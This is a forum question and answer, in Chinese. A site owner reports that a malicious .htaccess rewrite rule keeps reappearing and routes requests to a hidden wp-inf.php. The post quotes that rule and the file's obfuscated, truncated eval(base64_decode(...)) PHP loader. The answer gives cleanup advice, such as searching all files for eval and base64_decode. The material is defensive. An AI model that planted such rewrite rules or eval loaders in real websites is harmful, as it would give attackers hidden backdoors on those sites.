我有一个使用codeigniter构建的网站,我去年安装了wordpress来创建一个博客。但是,自从3个星期前,当我尝试访问我的管理站点并出现codeigniter 404错误时,问题就出现了。所以我意识到问题是.htaccess是某种东西写的。而且我认为是wordpress,我删除了添加的代码,一切都很好,但是htaccess又被写了,所以我删除了包含所有wordpress文件的博客文件夹,问题又出现了,然后我从中删除了wp_表我的数据库,但问题仍然存在。 编写的代码是:
# BEGIN SYSTEM API
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^al/(.*)$ myfolder/wp-inf.php?$1 [L]
# END SYSTEM API
我搜索了wp-inf.php文件,我找到了类似的东西:
<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2c.....")); ?>
我不知道该做什么或在哪里找到写我的htaccess的文件。我一直在清理和删除一些文件,但没有。
希望你能帮助我。 谢谢
编辑:****** 如果我解码base64_decode里面的内容会出现:
error_reporting(0); $lru = "gg/4623696-260514551155404-520n89823525745/765s127r625o9
(edited)
}echo $result; exit; }
答案 0 :(得分:0)
创建新服务器并传输数据不会有帮助,因为它的文件正在编写你的htaccess而不是访问问题。你要做的就是在你的所有文件中搜索&#39; base64_decode&#39;并且&#39; eval&#39;并查看这些文件是否默认来自wordpress,或者是否被创建并命名为混淆,例如在wordpress中默认没有名为wp-inf.php的文件。这两个功能是用于恶意意图的90%的时间。
您可以使用此解码器解码实际代码并查看其意图。 https://www.base64decode.org/
另一种方法是将文件夹结构与orignal wordpress结构进行比较。
为了避免将来发生这种情况,请尝试永远不要使用任何无效的主题或插件。